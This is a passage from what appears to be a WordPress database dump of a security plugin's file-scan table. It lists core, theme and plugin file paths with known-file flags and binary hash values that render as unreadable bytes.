F������C','A)Y:o�D�J��,��￘�_�T��\r=','',0,'?'),('I6.:\n(��i\0B��','wp-includes/rest-api/fields/class-wp-rest-user-meta-fields.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�H\r\r�0�X/^�0R','O��1�-p�Qۊ��8�Z+�$[��j���K��','',0,'?'),('I6U�\r7����3p�','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/falsepositive.key',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��h<��|�7b����','��_�^F\"��;+r&Z~ӦQ����|�5�','',0,'?'),('IQM{��:�\r|�6c�e','wp-content/plugins/wp-cerber/assets/flags/il.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D��~����3�24�Z�','�b=؜1<�:�1�ƭ��nn���`�%ޘ��Ϯ�','',0,'?'),('Ia��`���T�5L[-�','wp-content/themes/simpleshift/inc/kirki/includes/lib/class-kirki-colourlovers.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#>w��,�_�o�\'F','�%�,7�	�8�<������j��JV��7�U�','',0,'?'),('Ia�~,�+�*��! �','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/mode/css/scss_test.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�M�|H:�j���oF�','�\"���Iff��y�[לƵ�24tjU�I����','',0,'?'),('I~��M��#����z','wp-content/themes/catch-flames/images/demo/featured3-350x263.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���3sO<>�����\n','��p��1�ct+���(�:�p0pB���+','',0,'?'),('I�.�ө��\r^���r�','wp-content/themes/exoplanet/js/jquery.superfish.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R�1�4��ű�d�2Ν','v>@@�WbJ	�l0�2��3і�.]�ݹ$�Ƌ�`','',0,'?'),('I��:Bs�#���@�','wp-blog-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_BZF1���y����)',';\Z�/\\b���t���I���͝���h��w�','',0,'?'),('I�|��9o%�>њ��','wp-content/themes/simpleshift/inc/kirki/includes/controls/class-kirki-controls-color-palette-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�j�X�FV�m�U�9�','��c�&8�rwϜޮ�?�[6\\��	�����','',0,'?'),('I�O����+i��.��','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/addon/search/matchesonscrollbar.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0�\'p�h�H�R�$v','�R\"�S�}����|�Xt�⽾��/����K�','',0,'?'),('I��fR\"�øi�HSh7','wp-content/themes/catch-responsive/images/headers/logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\Z\rvX�J�U�TG���;','��nb+/���Hw���?~�\n�X�ގ�M�v<','',0,'?'),('I��!{����j��H��','wp-content/themes/exoplanet/js/modernizr.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w�h��P��5�oVU',' �ǎtZ��zȘ:�Sw�B�O*��H�Ӣ�','',0,'?'),('I�Ԭ�l��v0O','wp-includes/js/dist/core-data.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+�;Q��z@�?#�_�','�2�Fsc�jp{�ѳtG��1D�Y0�Ƶ�QV�@��','',0,'?'),('I��4\r���8�q��&','wp-content/themes/Endolf/inc/extras.php',0,'�r؏�h8h�)/���{','�r؏�h8h�)/���{','\ru�<�\Z�%=;(5�C��m&�c�^�\\a�','',0,'?'),('I�PE�Xt�FH�%�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/ChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\0��Lv�[c��)?','�C�h!݀F$�}�wd�7b(�!�p�IF.L�','',0,'?'),('I��r%\'��lo�Fh','wp-content/themes/newsmag/assets/sass/mixins/_mixins-master.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M�9�ը�x��GpA0','.�q�C-�z !v�ո,�,9����wc�d4�','',0,'?'),('I�P/�)���R85Ѵ','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/addon/search/match-highlighter.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��h�䶇-��wmy4','�y��6�l�)^�*%��8�tb�Vz�0mQ1b','',0,'?'),('I��^��#\'?�\'','wp-content/themes/metro-magazine/template-parts/content-none.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J�tw��Sٿ\0�cII�','��t�ZN�߉q�n���E��܃E��o�3�','',0,'?'),('I�V/��6�s��','wp-admin/js/editor-expand.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','´R�[��6\\gTԄL_�','�vI\n6��6��%VG��}����@of�e;','',0,'?'),('J�%.��~�—q�l�','wp-includes/class-wp-text-diff-renderer-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-�����g0HFuI�','�_h+�U��H�i��_��e�	w����6��','',0,'?'),('JA��ҷ]�6/��','wp-content/themes/simpleshift/inc/kirki/includes/field/class-kirki-field-dashicons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!<�t^I�v����e#','�tM�V_d�B���A��4�D�ڇ��ǒ}��3	(','',0,'?'),('J?#�͌$M�7�c�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/AbstractPlaceRecord.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`�I.:���`PR�','#z��R�\ZHU���>B�nP,���\'�eT�tߺ','',0,'?'),('Jf�3?���_r�C�','wp-admin/images/w-logo-white.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n���Jvۢ~�y�\\�','n��D��� _�;�!G�םcV�0M9i�=�','',0,'?'),('J��E[�7U��\Z�~','wp-includes/js/plupload/handlers.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O��	�~�5��8�ͫ;�','�	�\n�Z\rZ�B�[9��z��S)��4M%��','',0,'?'),('JyQl��D�!�HV�','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-bot-protection.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Ɩ}�7\"]� Q�P|','�]a��;�tMY^�v�6�j����ꬆ��','',0,'?'),('J8�E��Dh+���F','wp-admin/js/site-health.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ӛ���G��\'W���','���ij��x�\0ךM5+�i���@èQj8�v\"','',0,'?'),('J:��aB�o�>?�-&','wp-content/themes/monograph/js/superfish.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s\ZY�C\Z��Tibr;+','Zh��5aa���I)H�^6;��֭�@fT��\0','',0,'?'),('JW2���N�\\`�k��m(','wp-content/themes/simpleshift/inc/pro/section-pro.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;ҋ�ZУ�Y��','�ֶ��:��v���U�2��j���8��*��','',0,'?'),('J_9)���:�e�痸~','wp-content/themes/saybusiness/js/customize-preview.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*�.�����(V�','�j�t*�,#�6�e�I����.Oyhs^�5','',0,'?'),('Jj��r!�m��+�k ','wp-content/themes/graphene/images/headers/fireworks-thumb.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�̀H�9�k���c��#','����4��Vp�qU�t��@��.�AWNP��','',0,'?'),('Jn���{�DjK���\\H','wp-content/themes/catch-flames/inc/catchflames-widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C�\"����\\2sW\"m��','5���l�7]SU_6��Jr�,~e�\0�k~T','',0,'?'),('Jr$�����+�s�','wp-content/themes/exoplanet/functions/custom-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']T�_!�V�y�	c� ','4�f��}���p,u��K�;�	/&���D/�/ t','',0,'?'),('Jse���&R�0_��','wp-content/themes/enigma/images/snowball.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>��(k��1cN�_�b','l�?b�2qlh��Nl��slJ����cr��','',0,'?'),('J{�ֹZi^ùx�I','wp-admin/media-new.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':�?��T���i�\"=','\"��On]O�k;��Y�}��rG��yf�%�O 8\\','',0,'?'),('J��q������}�','wp-content/themes/Kent/sidebar.php',0,'�3����L��e','�3����L��e','����\\$<�[\"�����hn�7XII�MW�','',0,'?'),('J�>����\"��/','wp-includes/Requests/Auth.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1��R��W��ÔO[��J','bO�Q�wù�LѠâ��������9Q��lrl','',0,'?'),('J������V4�\"','wp-content/themes/graphene/images/social/wakoopa.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���/������_x]','q��>1�~/bLb`�%uas����N>���\\�\'�`)','',0,'?'),('J�����Ǵ�Ծ�c�','wp-content/themes/twentynineteen/images/pattern_01.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<�;�QB��X����','��(��3�g`&}�5)�s��}me2�G��[�','',0,'?'),('JŃ\'�5�?�$۴՟4','wp-content/themes/wp-simple/inc/kirki/assets/js/controls/color-palette.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{��\0�]��\r�uǛ','�E&�VM��>(O��?H-�/#biCB�W','',0,'?'),('J�(�j\\�MP�p�bg','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/mode/simple.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��P�uT��i)�\n�4V�','k�d��E���M��(S$�Lh搖#L{.#c?�','',0,'?'),('Jլ4��\r�n���','wp-content/plugins/wordfence/modules/login-security/img/ui-icons_777620_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J�\\c7�y�x�гl','�~��qV����*\'�1�����]3�^�����m','',0,'?'),('J��GBVld���X8�','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/addon/hint/show-hint.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�޷�&��-\r�bn','��\nޒ�֨Gr�5Ѩ�-|O��`�U\"��k��B','',0,'?'),('J�ЈP�Eƥa|%�\n@V','wp-content/themes/wp-simple/assets/js/jquery.easing.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���s�>߃iB���\0','=[�`M�D5�H0����~h��IƱfF\0�H','',0,'?'),('J뙤%��@�=��(','wp-content/themes/Yegor/aq_resizer.php',0,'ob�t��N�1qg','ob�t��N�1qg','Q6������O�&[쮀ʵ��j���@���?V','',0,'?'),('J򾁬��Oh��sDؾ','wp-includes/js/zxcvbn.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|	���#PV	/{�M�_','v�XI�9��n�1e�6��C�\\�.p+�\"��K�','',0,'?'),('K�,��<�fƑY�','wp-content/themes/twentytwenty/inc/custom-css.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K���<���ȝ���a','ߌ녔B��J+�f�,q*�WC\"^_�V\0.s�@�','',0,'?'),('K���ߺ�b�','wp-content/plugins/wordfence/lib/compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>���z�x��C�}','�Nܓ�#d�t�B!\"M՞�==�@o��','',0,'?'),('K0���\r��ܐcn�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�29Y¿,E#�/����','� � ��h<)s��>-P��{���K���I�\0��','',0,'?'),('K9\'Cs��w0�*o�{','wp-content/themes/advance/inc/kirki/assets/js/postmessage.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p�&aJ\\!MK�P�7','���I�0���(\'{���I5o����0[\\x','',0,'?'),('K>�^[�P�F�1�h:','wp-includes/blocks/social-link.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0,}J\"��N������','�ޝ�+-%]����ٲ�d�)�_�v?O�(�Y\'\\','',0,'?'),('KI����l,z\"�B,~�','wp-content/themes/simpleshift/inc/kirki/includes/controls/class-kirki-controls-multicheck-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Abz�=��\\Z�p','���T�Wt�^Z\Z	U]\Z\Z%� ��[gxF','',0,'?'),('KKOf�Sd�iB0Ov��','wp-content/plugins/wordfence/views/scanner/scanner-status.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\j�6Ii��\\u�v','\"9t��Y?�²�L���ykg������=�ۢ�','',0,'?'),('KY߻�z���Pk�','wp-content/themes/simpleshift/inc/kirki/includes/controls/class-kirki-controls-spacing-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ʅ�	-����8��\'\Z','V�:��NP��sMO\Zg�o���;u�o�3Qm��','',0,'?'),('KfS�!c#�\\�\ZQ�H','wp-content/themes/advance/css/advance-mobile.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���a{������','�9}�81�-�nZ/.�X��N.Ne��N��S(^�','',0,'?'),('Kf+�\rl\ZGZƮ]�','wp-content/themes/graduate/inc/custom-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}{/?\\��i2ۓ�T�f','�	��T(���\r��:,�.�9��?�qT\\@�\0�1','',0,'?'),('Kl­R9�ʔ���$�<','wp-content/themes/weblog/assets/library/owl-carousel/owl.carousel.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��r/�>(���c�p','\"�g����O�Nd���Z�m{x�%��@|:w�','',0,'?'),('K|:t����W�#S㣔','wp-content/themes/advance/inc/kirki/includes/settings/class-kirki-settings-default-setting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`(��bꂙ�^u\':','�M��ef�܎>�y�e5���\\�N{$kk��','',0,'?'),('K�nҋD&sR�WU(�','wp-admin/css/farbtastic.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#�^�:�G�(���:k\n','4��7V�f�� �/��������D��W3p','',0,'?'),('K�?&.ɳ�s�ovR�','wp-content/themes/Yegor/js/jquery.carouFredSel-6.2.1-packed.js',0,'r�_��Q���7!���','r�_��Q���7!���','�;���,^\n<��ĈA\"��Ij\"+�׸�;G�N','',0,'?'),('K�c��#2s�/(�\"�','wp-includes/widgets/class-wp-widget-pages.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J�E,��ߓ%_�','<6�8��1J�ߧr(;�c�?@�|uR�\nŞ�','',0,'?'),('K��<�H<7�E�,l��','wp-content/plugins/wordfence/views/waf/options-group-brute-force.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',�p�k�<���#Y','Qx�b���nbWK����E*�l�o��ޅ��ʛ��','',0,'?'),('K��cE�j��zeů�8','wp-includes/block-patterns/text-three-columns-buttons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8�tH�W��%���','ޗ��غ�Ku�\0M�x>]Z�\"�z�8Ŏ�V','',0,'?'),('K��ɹ���jwD�x�','wp-content/plugins/wp-cerber/assets/flags/us.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J��V�w\Z]�Ay��','���L�CI`�^�J4�=��0���C�C}�','',0,'?'),('K����\r\\Uz��\Z:\'','wp-includes/sodium_compat/namespaced/Core/ChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V�*��F谯��<��l','�®�R�l�U�����wz�ank��G�t�3�','',0,'?'),('K��]C��l7:�D\0','wp-admin/js/widgets/media-audio-widget.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P IM�;p8vn��[�S','����9j��lxB�eH:�y�%}�c	TP�_�','',0,'?'),('K�Lx<C���H��e\Z','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/HSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-�EN�Ăۛ(\n�n','����Ѭ}^�EF����>��ڂB��','',0,'?'),('K�ՒǤ�.��g���','wp-content/themes/catch-responsive/inc/customizer-includes/catchresponsive-customizer-header-options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9���0�3K<w��47','1�筧����i�~��3��9f���\\͆�v�','',0,'?'),('KיH˕;SxƯ,��y','wp-content/themes/Endolf/sidebar.php',0,'�$,c�ey����g3\0','�$,c�ey����g3\0','aag7��[�a�e�u9�;��X%Y,T��x�','',0,'?'),('Kಬ�hs�� -�J��','wp-content/themes/Kent/index.php',0,'%M��x^CI�LM���','%M��x^CI�LM���','�Ů�v_�8��\"ӿu��)��0k>�L!c�','',0,'?'),('K�bw��y��.�3�{¥','wp-content/plugins/wp-cerber/assets/flags/pk.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����00�%��[.�','Gjۀ���H��$�׃��m\'�^ O�n���','',0,'?'),('K� ���*�;ܼ�nc','wp-includes/blocks/calendar/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Y��P#����(i�','�D���]^��~��>�r~]�E^anK-qHMe�','',0,'?'),('K��W�&\0\0K�\06�G�','wp-admin/js/set-post-thumbnail.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':1N�(�xl�X��\'','v9�\n{lK��~q�#�>��ߦ��� J�`~','',0,'?'),('K�K+�2�	aeZ�e','wp-includes/class-walker-comment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I#�h�Z~�����@��','�Xs�W��l����:\"��0����;����LL','',0,'?'),('L\0-�I�J$A�1L�y�','wp-content/themes/enigma/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��1���g*7���I-','����v�K��Ŀ�tT���\0[�.W�2D	','',0,'?'),('L\n³e��2��4lp','wp-content/themes/hitmag/template-parts/content-single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\Z9���%���,us','��\"�rT4��vj���N3ʗp|I+�R%����','',0,'?'),('L��Vr�Uڪ^\\o��','wp-content/themes/catch-flames/js/jquery.waypoints.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E��D{_^ݵ�O~�j','���bQg�%+}/d�����3C�{��{�S�qr','',0,'?'),('L<#���\Z����}','wp-includes/js/tinymce/skins/lightgray/img/loader.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9K���M�:�Tf�9','��;���T��O`(6��,�sk�Z���c�R��+','',0,'?'),('L#�Ǜ��z��=~�x�','wp-content/themes/advance/inc/kirki/assets/js/controls/radio-buttonset.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�0{�I��y���-��1','��pǻ�_o�y���`(.�g��\\�B���,','',0,'?'),('L#��/۰*�3���\r','wp-admin/includes/class-wp-terms-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\0Up�\0�.c*�a�','\'�]pn������v�\r>A���;¯P \Z(-��','',0,'?'),('L$]��tr4<,^�[%+|','wp-content/themes/skt-pathway/images/hr_footer.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]P`_�v�����8#7','�?i*�g�\'���=[c|��`zi�c�e�;�YQ�','',0,'?'),('L\'(�i��хm�-&�','wp-content/themes/university-hub/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')Nj�-���F3BY�',':�B��s��&|�G��Q�8����{�\"aM','',0,'?'),('L(��n�9[2�C6�','wp-includes/js/zxcvbn-async.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��E��\nO\\��Y�b','��\'FP�\Z�/G\n��J����\\B��\Z��IT�','',0,'?'),('L1��jM�c�3��K�{','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/mode/css/css.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$)B�4GQ\'[E','�|L���_~U�B��\n\\����I�����(\\','',0,'?'),('L<K5G��Sq�Tz��','wp-content/themes/weblog/acmethemes/customizer/customizer-core.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��F�1|�k�\nR[�','Qi[�X\\�h��`kM5�,0�U����M��M\0','',0,'?'),('L<O�������T^','wp-content/themes/Kent/sponsors.php',0,'����fؘ;��DS�','����fؘ;��DS�','���+�4�\nlj�(�fS�*��hP��|z�','',0,'?'),('LFb`�����Z�4��','wp-content/themes/graduate/template-parts/content-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���a���U�V���\r','f�,RUŀ��9�#�JX.\rd)3��ΎH(����','',0,'?'),('LP�����ݥ���','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/addon/fold/markdown-fold.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x;V� \0E�)`� ','�0���+�5߯��2{�\Z�(�\r *�g��','',0,'?'),('LR7Q��ToG|�{','wp-content/plugins/wordfence/lib/viewFullActivityLog.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}�>��&Q)�Fy�k','e�i�p��r9ݴZ\\�\\Q~`�?�7�=�R�','',0,'?'),('L[3^���z��:','wp-content/themes/simpleshift/inc/kirki/includes/field/class-kirki-field-radio-buttonset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�xIu�3�x���L�Q','(%��O �CW��I�VXV����29�_��\\�','',0,'?'),('L\\7ڇ�6$ۀ\\�K�','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/mode/twig/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\0�7gR9)\Z<{O�','ʢ��PU��R.�(�8�mр�֟-�����\n-b','',0,'?'),('L_\'m�*�l��z+k','wp-content/themes/wp-simple/inc/kirki/assets/scss/controls/select.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d)b9��j��Y�oΚ','�}5�~��EPUW�m��nq�:;D�B��:K��E','',0,'?'),('Lap���8g�V�,��g�','wp-includes/js/dist/vendor/react-dom.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C��InV��9����','LrJ�#��6h����\r�ȴD�R5��b:uM','',0,'?'),('Lb\ZmT$-�*�[2�ʘ','wp-content/themes/enigma/fullwidth.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y�hͿmÝ��mz��;','k �����f�p�n>[�K}�Tz<��&Lv�0�','',0,'?'),('Lb\Z�%+Λ����','wp-content/themes/catch-flames/images/demo/slider-2-1600x650.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��t�bK�B��*C��','�c[����:��cT�Րi�,�n��5','',0,'?'),('Le��*f�Imhr�%i&','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/hint/show-hint.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1���q���zAHL3','�1��+kI_Ԁޘ���#O�C6�\n�c��','',0,'?'),('Lfg�l~��Y�/��','wp-content/themes/wp-simple/inc/kirki/kirki/includes/class-kirki-l10n.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���d}\0(�	��l�','k,;u0����q��r�L��\r�N�-�i�8W','',0,'?'),('LsЇś\n�c}>�K��','wp-includes/css/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��`b�L֏�Uy�/','��\r�~�W$A�\"ac�����G<��HZ<�8`','',0,'?'),('Lw+��$�4|�ns�w','wp-content/themes/twentynineteen/template-parts/content/content-none.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~��+�����zg��','@u� |-�\ZK\Zbk�^��R4hM�Ψ����','',0,'?'),('Lz����Z��#�<','wp-includes/class-wp-locale-switcher.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\"�?�F�w,�T��','!@�B��<6�ꁒ�Ku��Pm=��+�/c_�','',0,'?'),('L��e�t\"pc(	�e�','wp-includes/wp-db.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��yAS9�ie��P�','����I�&���e�*��7�K38�����','',0,'?'),('L�<�)���I6��','wp-content/themes/auberge/template-parts/loop-food-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��A�U��^�tF3�','�A�¡a�Ve�I$��4���=�/�<ܧǁ�v�','',0,'?'),('Lͨgjcc�4.�','wp-content/themes/hitmag/inc/kirki/includes/class-kirki-fonts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[�D�~����4�:','Z�y�P�X7�wg6Rz��4�^�l���O','',0,'?'),('Lցߢ�[�>ex�dY','wp-content/themes/event/css/editor-style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�bW�8�C#D-�z�|p','zq���pIE�e@~� o8qR��Ȯ','',0,'?'),('L�\r�%��{��','wp-includes/blocks/social-link/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q�&X�@�$>y�@�','�#V�b��v����E\Z\Z6�妅Y9l�\"�s�','',0,'?'),('L�Ҝ��������h�\n','wp-content/themes/event/js/event-flexslider-setting.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��б��F)��H��Gk�',':��x�F�����3��ž�n���3�m��','',0,'?'),('L㋐���C�)�o�yS','wp-content/themes/wp-simple/front-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ki�W����dj�H*�G','�NJc�p&�!��?`����A�aQw�[�','',0,'?'),('L�\r��Ȧ:��n�h\'','wp-content/plugins/akismet/_inc/akismet.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M�s��r�\n�c�J(','����ra�H�\n��}`�R��N��|���:G','',0,'?'),('L+q�V�;�h��Y�','wp-includes/fonts/dashicons.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M���N:��\'�ʤ��ȹ','J��!�����XLl`�e��O��s�H����','',0,'?'),('L�>t���N�����','wp-admin/css/colors/blue/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��5Iה�g,)Z�YM�','�\\k��S�뚑�n wW��	�!�*�~�v��','',0,'?'),('L��)��a$�D-�Ӯ�J','wp-includes/js/tinymce/plugins/wplink/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m��3���ܖ3��M','z�N\'A�%�S��@4�U���BD���q����','',0,'?'),('Mx1NjTm�R_2o','wp-content/plugins/wordfence/views/dashboard/global-status.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','˫\'�m�`�0>�+#��','���������p������Pv?Z�F��QQcj','',0,'?'),('M�CـB �g\r����t','wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-switch-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>jL�1�K��r ��X','\n�,���xb�9dk���QK�x�G�2���','',0,'?'),('M1��/�n��̖Q��','wp-includes/css/dist/components/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c��`=\"����y�)','�xp�3�>9eQ<�jCQ���g@M�/�w','',0,'?'),('M<�����h�s�a)�','wp-content/themes/event/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b!q�wҍ��\n��J²','��)�T��+�#-�֕�M�g��D���:���','',0,'?'),('M?,5�*�����K*�f','wp-admin/js/post.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�tm�{$,����','A�Y����}�U=��2��\'\Z�� �Z�0�<�','',0,'?'),('MC�7��@<�ùՖ','wp-content/themes/graphene/images/social/youtube.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f)R����)}ʅ��J','� v��C9�D�]��$�._�:�<J��y�','',0,'?'),('MHW�����7���','wp-content/themes/auberge/includes/plugins/advanced-custom-fields/advanced-custom-fields.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Tq���Cw�ŨWZ�','��W�{X���~����o�ZQl�E��B8�','',0,'?'),('MW�	���:��ي','wp-admin/images/align-none.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�eqd2���u����\r','�g(�1�X�{� [].���T����A��','',0,'?'),('MY��G��\\tX����/','wp-includes/customize/class-wp-customize-color-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&��S?��|��G','h	�3|:Q9z���4Y1[�{^�	$;�#�q��','',0,'?'),('Mpqi���Bi�\ne','wp-content/themes/newsmag/assets/vendors/fontawesome/FontAwesome.otf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bF��ʎ�����vR{ 